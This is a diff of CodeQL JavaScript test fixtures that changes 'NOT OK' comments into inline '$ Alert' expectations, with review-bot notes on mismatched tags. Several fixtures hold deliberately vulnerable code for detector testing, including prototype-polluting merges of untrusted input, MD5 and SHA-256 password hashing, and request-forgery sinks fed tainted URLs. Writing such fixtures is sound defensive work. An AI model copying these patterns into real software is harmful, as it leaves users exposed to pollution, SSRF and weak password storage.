@@ function copyUsingEntries(dst, src) { if (dst[key]) { copyUsingEntries(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } }); } @@ -277,7 +277,7 @@ function copyUsingReflect(dst, src) { if (dst[key]) { copyUsingReflect(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } }); } @@ -290,7 +290,7 @@ function copyWithPath(dst, src, path) { } else { let target = {}; target[path] = {}; - target[path][key] = src[key]; // OK + target[path][key] = src[key]; doSomething(target); } } @@ -305,7 +305,7 @@ function typeofObjectTest(dst, src) { if (dst[key] && typeof value === 'object') { typeofObjectTest(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } } 
@@ -319,7 +319,7 @@ function mergeRephinementNode(dst, src) { if (dst[key] && typeof value === 'object') { mergeRephinementNode(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } } @@ -335,7 +335,7 @@ function mergeSelective(dst, src) { if (dst[key]) { mergeSelective(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -354,7 +354,7 @@ function mergePlainObjectsOnly(target, source) { if (isNonArrayObject(source[key]) && key in target) { target[key] = mergePlainObjectsOnly(target[key], source[key], options); } else { - target[key] = source[key]; // OK - but flagged anyway due to imprecise barrier for captured variable + target[key] = source[key]; // $ SPURIOUS: Alert - due to imprecise barrier for captured variable } }); } @@ -370,7 +370,7 @@ function mergePlainObjectsOnlyNoClosure(target, source) { if (isNonArrayObject(source[key]) && key in target) { target[key] = mergePlainObjectsOnlyNoClosure(target[key], source[key], options); } else { - target[key] = source[key]; // OK + target[key] = source[key]; } } } @@ -390,7 +390,7 @@ function mergeUsingCallback(dst, src) { if (dst[key]) { mergeUsingCallback(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK - but not currently flagged + dst[key] = src[key]; // $ MISSING: Alert } }); } @@ -400,7 +400,7 @@ function mergeUsingCallback2(dst, src) { if (dst[key]) { mergeUsingCallback2(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } }); } @@ -416,7 +416,7 @@ function copyUsingWrappedRead(dst, src) { if (target) { copyUsingWrappedRead(target, value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } } @@ -433,7 +433,7 @@ function copyUsingAlmostSafeRead(dst, src) { if (target) { copyUsingAlmostSafeRead(target, value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } } 
@@ -450,7 +450,7 @@ function copyUsingSafeRead(dst, src) { if (target) { copyUsingSafeRead(target, value); } else { - dst[key] = value; // OK + dst[key] = value; } } } @@ -462,9 +462,9 @@ function copyUsingForOwn(dst, src) { copyUsingForOwn(dst[key], src[key]); } else { // Handle a few different ways to access src[key] - if (something()) dst[key] = src[key]; // NOT OK - if (something()) dst[key] = o[key]; // NOT OK - if (something()) dst[key] = value; // NOT OK + if (something()) dst[key] = src[key]; // $ Alert + if (something()) dst[key] = o[key]; // $ Alert + if (something()) dst[key] = value; // $ Alert } }); } @@ -474,7 +474,7 @@ function copyUsingUnderscoreOrLodash(dst, src) { if (dst[key]) { copyUsingUnderscoreOrLodash(dst[key], src[key]); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } }); } @@ -486,7 +486,7 @@ function copyPlainObject(dst, src) { if (dst[key] && isPlainObject(src)) { copyPlainObject(dst[key], src[key]); } else { - dst[key] = src[key]; // OK - but flagged anyway + dst[key] = src[key]; // $ SPURIOUS: Alert } } } @@ -499,7 +499,7 @@ function copyPlainObject2(dst, src) { if (isPlainObject(target) && isPlainObject(value)) { copyPlainObject2(target, value); } else { - dst[key] = value; // OK + dst[key] = value; } } } @@ -514,7 +514,7 @@ function usingDefineProperty(dst, src) { } else { var descriptor = {}; descriptor.value = src[key]; - Object.defineProperty(dst, key, descriptor); // NOT OK + Object.defineProperty(dst, key, descriptor); // $ Alert } } } @@ -526,7 +526,7 @@ function copyUsingForInAndRest(...args) { if (dst[key]) { copyUsingForInAndRest(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -544,7 +544,7 @@ function mergeUsingCallback3(dst, src) { if (dst[key]) { mergeUsingCallback3(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } }); } 
@@ -556,7 +556,7 @@ function copyHasOwnProperty2(dst, src) { if (Object.hasOwn(dst, key)) { copyHasOwnProperty2(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -568,7 +568,7 @@ function copyHasOwnProperty3(dst, src) { if (_.has(dst, key)) { copyHasOwnProperty3(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -602,7 +602,7 @@ function merge_captureBarrier(dest, source) { if (dest[key]) { merge_captureBarrier(dest[key], source[key]); } else { - dest[key] = captureBarrier(source[key]); // OK - but currently flagged anyway + dest[key] = captureBarrier(source[key]); // $ SPURIOUS: Alert } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/angularmerge.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/angularmerge.js index 041d9adf02fc..a8fdfde4f382 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/angularmerge.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/angularmerge.js @@ -1,3 +1,3 @@ addEventListener("message", (event) => { - angular.merge({}, JSON.parse(event.data)); // NOT OK + angular.merge({}, JSON.parse(event.data)); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-non-vulnerable-lodash/tst.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-non-vulnerable-lodash/tst.js index ba7d026b9cd9..8e50da57e315 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-non-vulnerable-lodash/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-non-vulnerable-lodash/tst.js @@ -4,5 +4,5 @@ let _ = require('lodash'); let app = express(); app.get('/hello', function(req, res) { - _.merge({}, req.query.foo); // OK + _.merge({}, req.query.foo); }); 
diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js index b1da6d9ab05d..8111eb36d94a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js @@ -4,17 +4,17 @@ let _ = require('lodash'); let app = express(); app.get('/hello', function(req, res) { - _.merge({}, req.query.foo); // NOT OK - _.merge({}, req.query); // NOT OK - but not flagged + _.merge({}, req.query.foo); // $ Alert + _.merge({}, req.query); // $ MISSING: Alert _.merge({}, { - value: req.query.value // NOT OK + value: req.query.value // $ Alert }); let opts = { thing: req.query.value // wrapped and unwrapped value }; _.merge({}, { - value: opts.thing // NOT OK + value: opts.thing // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.html b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.html index 02d6d086d547..47c340cb8784 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.html +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.html @@ -1,7 +1,7 @@ \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.js index acbfa2acbb42..5b1b7a277081 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.js 
@@ -1,6 +1,6 @@
 import * as webix from "webix";
 addEventListener("message", (event) => {
- webix.extend({}, JSON.parse(event.data)); // NOT OK
- webix.copy({}, JSON.parse(event.data)); // NOT OK
+ webix.extend({}, JSON.parse(event.data)); // $ Alert
+ webix.copy({}, JSON.parse(event.data)); // $ Alert
 });
diff --git a/javascript/ql/test/query-tests/Security/CWE-916/tst.js b/javascript/ql/test/query-tests/Security/CWE-916/tst.js
index c5f1c31127a8..d41c6b719a18 100644
--- a/javascript/ql/test/query-tests/Security/CWE-916/tst.js
+++ b/javascript/ql/test/query-tests/Security/CWE-916/tst.js
@@ -1,9 +1,9 @@
 var password = "secret";
-require("bcrypt").hash(password); // OK
+require("bcrypt").hash(password);
-require('crypto').createCipher('aes192').write(password); // NOT OK
+require('crypto').createCipher('aes192').write(password); // $ Alert
-require('crypto').createHash('sha256').write(password); // NOT OK
+require('crypto').createHash('sha256').write(password); // $ Alert
-require('crypto').createHash('md5').write(password); // NOT OK
+require('crypto').createHash('md5').write(password); // $ Alert
diff --git a/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js b/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js
index c55270377ede..a8d7d429cf86 100644
--- a/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js
+++ b/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js
@@ -9,17 +9,17 @@ export function MyComponent() {
 request(params.foo); // Possibly problematic, but not currently flagged.
 const query = window.location.search.substring(1);
- request('https://example.com/api/' + query + '/id'); // NOT OK
- request('https://example.com/api?q=' + query); // OK
+ request('https://example.com/api/' + query + '/id'); // $ Alert[js/client-side-request-forgery]
+ request('https://example.com/api?q=' + query);
 request('https://example.com/api/' + window.location.search); // likely OK - but currently flagged anyway
 const fragment = window.location.hash.substring(1);
- request('https://example.com/api/' + fragment + '/id'); // NOT OK
- request('https://example.com/api?q=' + fragment); // OK
+ request('https://example.com/api/' + fragment + '/id'); // $ Alert[js/client-side-request-forgery]
+ request('https://example.com/api?q=' + fragment);
 const name = window.name;
- request('https://example.com/api/' + name + '/id'); // NOT OK
- request('https://example.com/api?q=' + name); // OK
+ request('https://example.com/api/' + name + '/id'); // $ Alert[js/client-side-request-forgery]
+ request('https://example.com/api?q=' + name);
- request(window.location.href + '?q=123'); // OK
+ request(window.location.href + '?q=123');
 }
diff --git a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js
index 7b4c792bb366..50a7fe976998 100644
--- a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js
+++ b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js
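Review bot: `request('https://example.com/api/' + window.location.search); // likely OK - but currently flagged anyway` is left as a prose comment while every other expectation in this hunk moves to the `$` form, and the tests.js hunks of this same commit encode exactly that "flagged anyway" state as `// $ SPURIOUS: Alert`. If the query still reports this line, the inline-expectation runner will presumably count it as an unexpected result, so the line likely wants `// $ SPURIOUS: Alert[js/client-side-request-forgery]` to match the tagged style used on its neighbours. The context line `request(params.foo); // Possibly problematic, but not currently flagged.` would likewise be clearer as a `$ MISSING:` expectation if that gap is meant to be tracked. MyComponent's body starts before the hunk.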
@@ -13,40 +13,40 @@ let Uri = goog.require('goog.Uri'); var server = http.createServer(function(req, res) { var tainted = url.parse(req.url, true).query.url; - request("example.com"); // OK + request("example.com"); - request(tainted); // NOT OK + request(tainted); // $ Alert[js/request-forgery] - request.get(tainted); // NOT OK + request.get(tainted); // $ Alert[js/request-forgery] var options = {}; - options.url = tainted; // NOT OK + options.url = tainted; // $ Alert request(options); - request("http://" + tainted); // NOT OK + request("http://" + tainted); // $ Alert[js/request-forgery] - request("http://example.com" + tainted); // NOT OK + request("http://example.com" + tainted); // $ Alert[js/request-forgery] - request("http://example.com/" + tainted); // NOT OK + request("http://example.com/" + tainted); // $ Alert[js/request-forgery] - request("http://example.com/?" + tainted); // OK + request("http://example.com/?" + tainted); - http.get(relativeUrl, {host: tainted}); // NOT OK + http.get(relativeUrl, {host: tainted}); // $ Alert[js/request-forgery] - XhrIo.send(new Uri(tainted)); // NOT OK - new XhrIo().send(new Uri(tainted)); // NOT OK + XhrIo.send(new Uri(tainted)); // $ Alert[js/request-forgery] + new XhrIo().send(new Uri(tainted)); // $ Alert[js/request-forgery] let base = require('./config').base; - request(`http://example.com/${base}/${tainted}`); // NOT OK + request(`http://example.com/${base}/${tainted}`); // $ Alert[js/request-forgery] - request(`http://example.com/${base}/v1/${tainted}`); // NOT OK + request(`http://example.com/${base}/v1/${tainted}`); // $ Alert[js/request-forgery] - request('http://example.com/' + base + '/' + tainted); // NOT OK + request('http://example.com/' + base + '/' + tainted); // $ Alert[js/request-forgery] - request('http://example.com/' + base + ('/' + tainted)); // NOT OK - but not flagged [INCONSISTENCY] + request('http://example.com/' + base + ('/' + tainted)); // $ MISSING: Alert - 
request(`http://example.com/?${base}/${tainted}`); // OK + request(`http://example.com/?${base}/${tainted}`); request(`http://example.com/${base}${tainted}`); // OK - assumed safe @@ -58,14 +58,14 @@ var server = http.createServer(async function(req, res) { var tainted = url.parse(req.url, true).query.url; var client = await CDP(options); - client.Page.navigate({url: tainted}); // NOT OK. + client.Page.navigate({url: tainted}); // $ Alert[js/request-forgery] CDP(options).catch((ignored) => {}).then((client) => { - client.Page.navigate({url: tainted}); // NOT OK. + client.Page.navigate({url: tainted}); // $ Alert[js/request-forgery] }) CDP(options, (client) => { - client.Page.navigate({url: tainted}); // NOT OK. + client.Page.navigate({url: tainted}); // $ Alert[js/request-forgery] }); }) @@ -73,7 +73,7 @@ import {JSDOM} from "jsdom"; var server = http.createServer(async function(req, res) { var tainted = url.parse(req.url, true).query.url; - JSDOM.fromURL(tainted); // NOT OK + JSDOM.fromURL(tainted); // $ Alert[js/request-forgery] }); var route = require('koa-route'); @@ -81,15 +81,15 @@ var Koa = require('koa'); var app = new Koa(); app.use(route.get('/pets', (context, param1, param2, param3) => { - JSDOM.fromURL(param1); // NOT OK + JSDOM.fromURL(param1); // $ Alert[js/request-forgery] })); const router = require('koa-router')(); const app = new Koa(); router.get('/', async (ctx, next) => { - JSDOM.fromURL(ctx.params.foo); // NOT OK + JSDOM.fromURL(ctx.params.foo); // $ Alert[js/request-forgery] }).post('/', async (ctx, next) => { - JSDOM.fromURL(ctx.params.foo); // NOT OK + JSDOM.fromURL(ctx.params.foo); // $ Alert[js/request-forgery] }); app.use(router.routes()); @@ -97,7 +97,7 @@ import {JSDOM} from "jsdom"; var server = http.createServer(async function(req, res) { var tainted = url.parse(req.url, true).query.url; - new WebSocket(tainted); // NOT OK + new WebSocket(tainted); // $ Alert[js/request-forgery] }); 
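Review bot: `options.url = tainted; // $ Alert` is the one converted expectation in this hunk that lacks the `[js/request-forgery]` suffix every neighbouring `$ Alert` carries, and the axios line `url: tainted // $ Alert` in the later `@@ -124,12` hunk of this file has the same gap. Both tags `[js/request-forgery]` and `[js/client-side-request-forgery]` appear in this CWE-918 directory, so if the bracket suffix is what ties an expectation to one query, these two untagged lines may be matched differently from the rest; `options.url = tainted; // $ Alert[js/request-forgery]` would remove the ambiguity, or, if the omission is deliberate, a short trailing remark stating why would spare the next reader the question. Both enclosing createServer callbacks start before their hunks.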
@@ -124,12 +124,12 @@ var server2 = http.createServer(function(req, res) { axios({ method: 'get', - url: tainted // NOT OK + url: tainted // $ Alert }) var myUrl = `${something}/bla/${tainted}`; - axios.get(myUrl); // NOT OK + axios.get(myUrl); // $ Alert[js/request-forgery] var myEncodedUrl = `${something}/bla/${encodeURIComponent(tainted)}`; - axios.get(myEncodedUrl); // OK + axios.get(myEncodedUrl); }) \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Statements/EphemeralLoop/tst.js b/javascript/ql/test/query-tests/Statements/EphemeralLoop/tst.js index 1b66865ea21c..683ca49fcafb 100644 --- a/javascript/ql/test/query-tests/Statements/EphemeralLoop/tst.js +++ b/javascript/ql/test/query-tests/Statements/EphemeralLoop/tst.js @@ -1,5 +1,4 @@ -// NOT OK -while(c){ +while(c){ // $ Alert switch(c){ case "/": break; @@ -8,8 +7,7 @@ while(c){ break; } -// NOT OK -function f() { +function f() { // $ Alert for (; k < numprecincts;) { var packet = createPacket(resolution, k, l); k++; @@ -17,14 +15,14 @@ function f() { } } -// OK + var oHasProps = false; for (var p in o) { oHasProps = true; break; } -// OK + while(c){ if (c === '"') break; diff --git a/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/tst.js b/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/tst.js index 47efe8c1cb6c..adbd85cf6157 100644 --- a/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/tst.js +++ b/javascript/ql/test/query-tests/Statements/IgnoreArrayResult/tst.js @@ -1,8 +1,8 @@ var arr = [1,2,3]; -arr.concat([1,2,3]); // NOT OK! +arr.concat([1,2,3]); // $ Alert -arr.concat(arr); // NOT OK! +arr.concat(arr); // $ Alert console.log(arr.concat([1,2,3])); diff --git a/javascript/ql/test/query-tests/Statements/ImplicitReturn/tst.js b/javascript/ql/test/query-tests/Statements/ImplicitReturn/tst.js index 114db4ed8d3e..35338b7bed10 100644 --- a/javascript/ql/test/query-tests/Statements/ImplicitReturn/tst.js 
+++ b/javascript/ql/test/query-tests/Statements/ImplicitReturn/tst.js @@ -1,17 +1,16 @@ -// NOT OK -function f() { +function f() { // $ Alert if (foo()) return true; } -// OK + function g() { if (foo()) return true; return false; } -// OK + function h() { open(); try { @@ -21,7 +20,7 @@ function h() { } } -// OK + function k(x) { switch (x) { case 1: @@ -31,20 +30,20 @@ function k(x) { } } -// OK + function l() { return 23; alert("Hi"); } -// OK + function m() { if (foo()) return true; throw new Error("not foo!"); } -// OK + function n() { if (foo()) return true; @@ -60,7 +59,7 @@ function foo() { } // -// OK: dual-use constructor +// OK - dual-use constructor function Point(x, y) { if (!(this instanceof Point)) return new Point(x, y); @@ -68,7 +67,7 @@ function Point(x, y) { this.y = y; } -// OK: infinite loops +// OK - infinite loops function q(n) { for (var i=0;;++i) if (i>2*n) @@ -96,14 +95,12 @@ function t(n) { } while("true"); } -// NOT OK -var u = function() { +var u = function() { // $ Alert if (foo()) return true; }; -// NOT OK -function v(b) { +function v(b) { // $ Alert if (b) return 1; } diff --git a/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/tst.js b/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/tst.js index f2331a705bdf..990179e6200a 100644 --- a/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/tst.js +++ b/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/tst.js @@ -1,19 +1,16 @@ -// OK + for (j = i - 1; j >= 0; --j) { } -// NOT OK -for (j = i + 1; j < strLength; --j) { +for (j = i + 1; j < strLength; --j) { // $ Alert } -// NOT OK -for (var i = 0, l = c.length; i > l; i ++) { +for (var i = 0, l = c.length; i > l; i ++) { // $ Alert } -// OK + for (i=lower-1; i>=0; --i) a[i] = 0; -// NOT OK -for (i=upper+1; i5; --i) + for (var j=i; i>5; --i) // $ Alert f(i, j); - // OK + for (var k=0; k Foo
Click me
-
Click me
+
Click me
\ No newline at end of file diff --git a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js index 7b9968115f5e..7f4296932d96 100644 --- a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js +++ b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js @@ -17,17 +17,17 @@ console.log(returnsValue()) console.log(stub()) - console.log(onlySideEffects()); // Not OK! + console.log(onlySideEffects()); // $ Alert - var a = Math.random() > 0.5 ? returnsValue() : onlySideEffects(); // OK! A is never used. + var a = Math.random() > 0.5 ? returnsValue() : onlySideEffects(); // OK - A is never used. var b = onlySideEffects(); console.log(b); - var c = 42 + (onlySideEffects(), 42); // OK, value is thrown away. + var c = 42 + (onlySideEffects(), 42); // OK - value is thrown away. console.log(c); - var d = 42 + (42, onlySideEffects()); // NOT OK! + var d = 42 + (42, onlySideEffects()); // $ Alert console.log(d); if (onlySideEffects()) { @@ -42,7 +42,7 @@ onlySideEffects: onlySideEffects } - var e = myObj.onlySideEffects.apply(this, arguments); // NOT OK! + var e = myObj.onlySideEffects.apply(this, arguments); // $ Alert console.log(e); function onlySideEffects2() { @@ -50,11 +50,11 @@ } var bothOnlyHaveSideEffects = Math.random() > 0.5 ? onlySideEffects : onlySideEffects2; - var f = bothOnlyHaveSideEffects(); // NOT OK! + var f = bothOnlyHaveSideEffects(); // $ Alert console.log(f); var oneOfEach = Math.random() > 0.5 ? onlySideEffects : returnsValue; - var g = oneOfEach(); // OK + var g = oneOfEach(); console.log(g); function alwaysThrows() { 
@@ -66,28 +66,28 @@ throw new Error("Important error!") } - var h = returnsValue() || alwaysThrows(); // OK! + var h = returnsValue() || alwaysThrows(); console.log(h); function equals(x, y) { return x === y; } - var foo = [1,2,3].filter(n => {equals(n, 3)}) // NOT OK! + var foo = [1,2,3].filter(n => {equals(n, 3)}) // $ Alert console.log(foo); import { filter } from 'lodash' - var bar = filter([1,2,4], x => { equals(x, 3) } ) // NOT OK! + var bar = filter([1,2,4], x => { equals(x, 3) } ) // $ Alert console.log(bar); - var baz = [1,2,3].filter(n => {n === 3}) // OK + var baz = [1,2,3].filter(n => {n === 3}) console.log(baz); class Deferred { } - new Deferred().resolve(onlySideEffects()); // OK + new Deferred().resolve(onlySideEffects()); Promise.all([onlySideEffects(), onlySideEffects()]) })(); @@ -104,16 +104,16 @@ class Foo { class Bar extends Foo { constructor() { - console.log(super()); // OK. + console.log(super()); } } () => { let equals = (x, y) => { return x === y; }; - var foo = [1,2,3].findLastIndex(n => { equals(n, 3); }) // NOT OK + var foo = [1,2,3].findLastIndex(n => { equals(n, 3); }) // $ Alert console.log(foo); - var foo = [1,2,3].findLast(n => { equals(n, 3); }) // NOT OK + var foo = [1,2,3].findLast(n => { equals(n, 3); }) // $ Alert console.log(foo); } diff --git a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst2.ts b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst2.ts index 6da3bde4bf01..758b4480c64e 100644 --- a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst2.ts +++ b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst2.ts @@ -3,4 +3,4 @@ declare function returnsSomething(): number; console.log(returnsSomething()); -console.log(returnsVoid()); // NOT OK! \ No newline at end of file +console.log(returnsVoid()); // $ Alert \ No newline at end of file 
diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/constant.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/constant.js index aa5ee0e1fb5b..dd0468451930 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/constant.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/constant.js @@ -1,4 +1,4 @@ function f() { - if (1 > 2) {} else {} // NOT OK - always false - if (1 > 0) {} else {} // NOT OK - always true + if (1 > 2) {} else {} // $ Alert - always false + if (1 > 0) {} else {} // $ Alert - always true } diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/defaults.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/defaults.js index a40fc483a06c..f16d5a000a22 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/defaults.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/defaults.js @@ -1,11 +1,11 @@ function defaultParam(param = 0) { - if (param > 0) {} // OK + if (param > 0) {} } function defaultPattern(obj, arr) { let { prop = 0 } = obj; - if (prop > 0) {} // OK + if (prop > 0) {} let [ elm = 0 ] = arr; - if (elm > 0) {} // OK + if (elm > 0) {} } diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/implicitReturn.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/implicitReturn.js index 7e198d0e0293..a8064ae69429 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/implicitReturn.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/implicitReturn.js @@ -2,5 +2,5 @@ function test() { let x = (function() { if (g) return 5; })(); - if (x + 1 < 5) {} // OK + if (x + 1 < 5) {} } diff --git a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js index fe4bb6486ce0..d698b7d1c29e 100644 
--- a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js +++ b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js @@ -30,7 +30,7 @@ function test(a, b) { if ((new X())){} x = 0n; - if (x) // NOT OK + if (x) // $ Alert ; } @@ -40,7 +40,7 @@ async function awaitFlow(){ if (y) v = await f() - if (v) { // OK + if (v) { } } @@ -57,29 +57,29 @@ async function awaitFlow(){ var unknown = unknownF(); if (unknown) return; - if (unknown) // NOT OK + if (unknown) // $ Alert return; }); (function (...x) { - x || y // NOT OK + x || y // $ Alert }); (function() { function f1(x) { - x || y // NOT OK, but whitelisted + x || y // $ Alert - but whitelisted } f1(true); function f2(x) { while (true) - x || y // NOT OK + x || y // $ Alert } f2(true); function f3(x) { (function(){ - x || y // NOT OK, but whitelisted + x || y // $ Alert - but whitelisted }); } f3(true); 
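Review bot: The two `x || y // $ Alert - but whitelisted` lines in `f1` and `f3` now assert that an alert is reported, but the comments they replace (`NOT OK, but whitelisted`) described the opposite, and the same commit annotates the deliberately suppressed cases in UselessConditionalGood.js as plain `// OK - whitelisted` with no expectation at all. If the query still whitelists these parameter-derived conditions, the inline expectation test will presumably report them as missing results once it is enabled for this directory; the existing .expected output would settle which it is. Either record the gap explicitly as `x || y // $ MISSING: Alert - whitelisted`, or drop the expectation and keep `// OK - whitelisted` as in the Good file. The IIFE wrapping `f1`–`f3` is opened in this hunk but closes outside it.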
@@ -91,52 +91,52 @@ async function awaitFlow(){ (function (x, y) { if (!x) { - while (x) { // NOT OK + while (x) { // $ Alert f(); } - while (true) { // OK + while (true) { break; } - if (true && true) {} // NOT OK - if (y && x) {} // NOT OK - if (y && (x)) {} // NOT OK - do { } while (x); // NOT OK + if (true && true) {} // $ Alert + if (y && x) {} // $ Alert + if (y && (x)) {} // $ Alert + do { } while (x); // $ Alert } }); (function(x,y) { - let obj = (x && {}) || y; // OK - if ((x && {}) || y) {} // NOT OK + let obj = (x && {}) || y; + if ((x && {}) || y) {} // $ Alert }); (function(){ function constantFalse1() { return false; } - if (constantFalse1()) // OK + if (constantFalse1()) return; function constantFalse2() { return false; } let constantFalse = unknown? constantFalse1 : constantFalse2; - if (constantFalse2()) // OK + if (constantFalse2()) return; function constantUndefined() { return undefined; } - if (constantUndefined()) // NOT OK + if (constantUndefined()) // $ Alert return; function constantFalseOrUndefined1() { return unknown? false: undefined; } - if (constantFalseOrUndefined1()) // NOT OK + if (constantFalseOrUndefined1()) // $ Alert return; let constantFalseOrUndefined2 = unknown? constantFalse1 : constantUndefined; - if (constantFalseOrUndefined2()) // NOT OK + if (constantFalseOrUndefined2()) // $ Alert return; }); @@ -145,12 +145,12 @@ async function awaitFlow(){ function p() { return {}; } - if (p()) { // NOT OK + if (p()) { // $ Alert } var v = p(); - if (v) { // NOT OK + if (v) { // $ Alert } - if (v) { // NOT OK, but not detected due to SSA limitations + if (v) { // $ Alert - but not detected due to SSA limitations } }); 
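Review bot: `if (v) { // $ Alert - but not detected due to SSA limitations` contradicts itself: the comment says the query does not report this condition, yet `$ Alert` asserts that it does, so the inline test would presumably flag a missing result here unless the SSA limitation has since been fixed. The request-forgery test in this same commit records a known gap as `// $ MISSING: Alert`; the same form fits here, `if (v) { // $ MISSING: Alert - not detected due to SSA limitations`. The `findOrThrow` hunk that follows contains the identical pair of lines and needs the same treatment. The IIFE containing `p()` is opened before this hunk starts; only its closing `});` is visible.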
@@ -160,12 +160,12 @@ async function awaitFlow(){ if (e) return e; throw new Error(); } - if(findOrThrow()){ // NOT OK + if(findOrThrow()){ // $ Alert } var v = findOrThrow(); - if (v) { // NOT OK + if (v) { // $ Alert } - if (v) { // NOT OK, but not detected due to SSA limitations + if (v) { // $ Alert - but not detected due to SSA limitations } }); @@ -173,14 +173,14 @@ async function awaitFlow(){ function f(){ return { v: unkown };} f(); var { v } = f(); - if (v) { // OK + if (v) { } }); (function() { function outer(x) { addEventListener("click", () => { - if (!x && something()) { // NOT OK, but whitelisted + if (!x && something()) { // $ Alert - but whitelisted something(); } }); diff --git a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditionalGood.js b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditionalGood.js index 7b3888c982a4..74e2c0f2439f 100644 --- a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditionalGood.js +++ b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditionalGood.js 
